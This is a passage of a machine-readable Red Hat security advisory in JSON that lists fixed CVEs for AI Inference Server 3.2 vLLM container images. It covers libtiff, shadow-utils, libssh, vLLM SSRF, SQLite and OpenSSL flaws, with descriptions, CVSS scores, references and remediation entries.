"url": "https://access.redhat.com/errata/RHSA-2025:23078"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libtiff: Segment fault in libtiff in TIFFReadRGBATileExt() leading to denial of service"
},
{
"cve": "CVE-2024-56433",
"cwe": {
"id": "CWE-1188",
"name": "Initialization of a Resource with an Insecure Default"
},
"discovery_date": "2024-12-26T09:00:54.065197+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2334165"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in shadow-utils. Affected versions of shadow-utils establish a default /etc/subuid behavior, for example, uid 100000 through 165535 for the first user account, that can conflict with the uids of users defined on locally administered networks. This issue potentially leads to account takeover by leveraging newuidmap for access to an NFS home directory or same-host resources for remote logins by these local network users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "shadow-utils: Default subordinate ID configuration in /etc/login.defs could lead to compromise",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-56433"
},
{
"category": "external",
"summary": "RHBZ#2334165",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2334165"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-56433",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56433"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-56433",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-56433"
},
{
"category": "external",
"summary": "https://github.com/shadow-maint/shadow/blob/e2512d5741d4a44bdd81a8c2d0029b6222728cf0/etc/login.defs#L238-L241",
"url": "https://github.com/shadow-maint/shadow/blob/e2512d5741d4a44bdd81a8c2d0029b6222728cf0/etc/login.defs#L238-L241"
},
{
"category": "external",
"summary": "https://github.com/shadow-maint/shadow/issues/1157",
"url": "https://github.com/shadow-maint/shadow/issues/1157"
},
{
"category": "external",
"summary": "https://github.com/shadow-maint/shadow/releases/tag/4.4",
"url": "https://github.com/shadow-maint/shadow/releases/tag/4.4"
}
],
"release_date": "2024-12-26T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 3.6,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "shadow-utils: Default subordinate ID configuration in /etc/login.defs could lead to compromise"
},
{
"acknowledgments": [
{
"names": [
"Ronald Crane"
]
}
],
"cve": "CVE-2025-5318",
"cwe": {
"id": "CWE-125",
"name": "Out-of-bounds Read"
},
"discovery_date": "2025-05-29T06:48:59.169000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2369131"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the libssh library in versions less than 0.11.2. An out-of-bounds read can be triggered in the sftp_handle function due to an incorrect comparison check that permits the function to access memory beyond the valid handle list and to return an invalid pointer, which is used in further processing. This vulnerability allows an authenticated remote attacker to potentially read unintended memory regions, exposing sensitive information or affect service behavior.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libssh: out-of-bounds read in sftp_handle()",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue requires an attacker with valid credentials to access a server, limiting the scope to legitimate users of the SFTP service. Due to this reason, this flaw has been rated with a Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-5318"
},
{
"category": "external",
"summary": "RHBZ#2369131",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2369131"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-5318",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5318"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-5318",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5318"
},
{
"category": "external",
"summary": "https://www.libssh.org/security/advisories/CVE-2025-5318.txt",
"url": "https://www.libssh.org/security/advisories/CVE-2025-5318.txt"
}
],
"release_date": "2025-06-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "libssh: out-of-bounds read in sftp_handle()"
},
{
"cve": "CVE-2025-6242",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2025-06-18T15:26:47.633000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2373716"
}
],
"notes": [
{
"category": "description",
"text": "A Server-Side Request Forgery (SSRF) vulnerability exists in the MediaConnector class within the vLLM project\u0027s multimodal feature set. The load_from_url and load_from_url_async methods fetch and process media from user-provided URLs without adequate restrictions on the target hosts. This allows an attacker to coerce the vLLM server into making arbitrary requests to internal network resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vllm: Server Side request forgery (SSRF) in MediaConnector",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated as having the severity of Important by the Red Hat Product Security team as a successful exploitation by an attacker may lead to confidential data being leaked or a denial of service. Additionally the fact a unprivileged user can trigger this vulnerability through the network also contributes for the severity.\n\nThis vulnerability has its risk amplified on orchestrated environments as pods running the vLLM may eventually communicate with each other through internal cluster routing, including services that should not have been exposed to external networks. An attacker may leverage this flaw to interact with internal services, perform network reconnaissance or trigger a denial of service by leading other internal services to fail.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6242"
},
{
"category": "external",
"summary": "RHBZ#2373716",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373716"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6242"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6242",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6242"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/security/advisories/GHSA-3f6c-7fw2-ppm4",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-3f6c-7fw2-ppm4"
}
],
"release_date": "2025-10-07T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "vllm: Server Side request forgery (SSRF) in MediaConnector"
},
{
"cve": "CVE-2025-6965",
"cwe": {
"id": "CWE-197",
"name": "Numeric Truncation Error"
},
"discovery_date": "2025-07-15T14:02:19.241458+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2380149"
}
],
"notes": [
{
"category": "description",
"text": "A memory corruption flaw was found in SQLite. Under specific conditions a query can be generated where the number of aggregate terms could exceed the number of columns available. This issue could lead to memory corruption and subsequent unintended behavior.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sqlite: Integer Truncation in SQLite",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in SQLite is categorized as Important rather than Critical because, although it involves memory corruption, the conditions required to trigger it are relatively constrained. The flaw arises when a query causes the number of aggregate terms to exceed internal limits, leading to potential buffer overflows or memory mismanagement. However, exploitation requires the ability to craft complex SQL queries and interact with the SQLite engine in a specific manner\u2014typically through direct SQL input. There is no known evidence of arbitrary code execution, privilege escalation, or remote exploitability as a direct result of this flaw. Additionally, most SQLite deployments are embedded in applications where input is tightly controlled or sanitized.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-6965"
},
{
"category": "external",
"summary": "RHBZ#2380149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-6965",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6965"
},
{
"category": "external",
"summary": "https://www.oracle.com/security-alerts/cpujan2026.html#AppendixMSQL",
"url": "https://www.oracle.com/security-alerts/cpujan2026.html#AppendixMSQL"
},
{
"category": "external",
"summary": "https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8",
"url": "https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8"
}
],
"release_date": "2025-07-15T13:44:00.784000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sqlite: Integer Truncation in SQLite"
},
{
"cve": "CVE-2025-8176",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2025-07-26T04:00:56.216434+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2383598"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in libtiff. The `get_histogram` function in `file/tiffmedian.c` exhibits a use-after-free condition when processing a specially crafted file, allowing a local attacker to trigger memory corruption. This manipulation results in a use-after-free vulnerability, and can lead to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "libtiff: LibTIFF Use-After-Free Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability has been rated Important because it involves a use-after-free flaw in the get_histogram function of LibTIFF\u2019s tiffmedian tool. Successful exploitation may allow a local attacker to execute arbitrary code or cause a denial of service, leading to loss of confidentiality, integrity, and availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-8176"
},
{
"category": "external",
"summary": "RHBZ#2383598",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2383598"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8176"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-8176",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8176"
},
{
"category": "external",
"summary": "http://www.libtiff.org/",
"url": "http://www.libtiff.org/"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/commit/fe10872e53efba9cc36c66ac4ab3b41a839d5172",
"url": "https://gitlab.com/libtiff/libtiff/-/commit/fe10872e53efba9cc36c66ac4ab3b41a839d5172"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/issues/707",
"url": "https://gitlab.com/libtiff/libtiff/-/issues/707"
},
{
"category": "external",
"summary": "https://gitlab.com/libtiff/libtiff/-/merge_requests/727",
"url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/727"
},
{
"category": "external",
"summary": "https://vuldb.com/?ctiid.317590",
"url": "https://vuldb.com/?ctiid.317590"
},
{
"category": "external",
"summary": "https://vuldb.com/?id.317590",
"url": "https://vuldb.com/?id.317590"
},
{
"category": "external",
"summary": "https://vuldb.com/?submit.621796",
"url": "https://vuldb.com/?submit.621796"
}
],
"release_date": "2025-07-26T03:32:08.851000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "libtiff: LibTIFF Use-After-Free Vulnerability"
},
{
"cve": "CVE-2025-9230",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2025-09-17T12:15:34.387000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2396054"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the OpenSSL CMS implementation (RFC 3211 KEK Unwrap). This vulnerability allows memory corruption, an application level denial of service, or potential execution of attacker-supplied code via crafted CMS messages using password-based encryption (PWRI).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openssl: Out-of-bounds read \u0026 write in RFC 3211 KEK Unwrap",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability was rated as Moderate because, while the potential impact includes an application level denial of service and possible arbitrary code execution, successful exploitation is considered unlikely due to the high attack complexity and the fact that password-based CMS encryption (PWRI) is rarely used in real-world deployments.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-9230"
},
{
"category": "external",
"summary": "RHBZ#2396054",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2396054"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-9230",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9230"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-9230",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9230"
}
],
"release_date": "2025-09-30T23:59:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-10T18:24:36+00:00",
"details": "For more information visit https://access.redhat.com/errata/RHSA-2025:23078",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23078"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:bddcf7ab6d576572b6d60822c313ffebcd9869e4fde93e32ac327821f93cf32b_amd64",
"Red Hat AI Inference Server 3.2:registry.redhat.io/rhaiis/vllm-cuda-rhel9@sha256:ec961e5acfde5c1ad0a7e0e2c86a0bf56b9bc46357fa124f9db6dff1006076ab_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "openssl: Out-of-bounds read \u0026 write in RFC 3211 KEK Unwrap"
},
{
"acknowledgments": [
{
"names": [
"Gareth C"
],
"organization": "AnchorSec Ltd."
}
],
"cve": "CVE-2025-9900",
"cwe": {
"id": "CWE-123",
"name": "Write-what-where Condition"
},
"discovery_date": "2025-09-03T02:48:12.111000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2392784"
}
],
"notes": [
{
"category": "description",
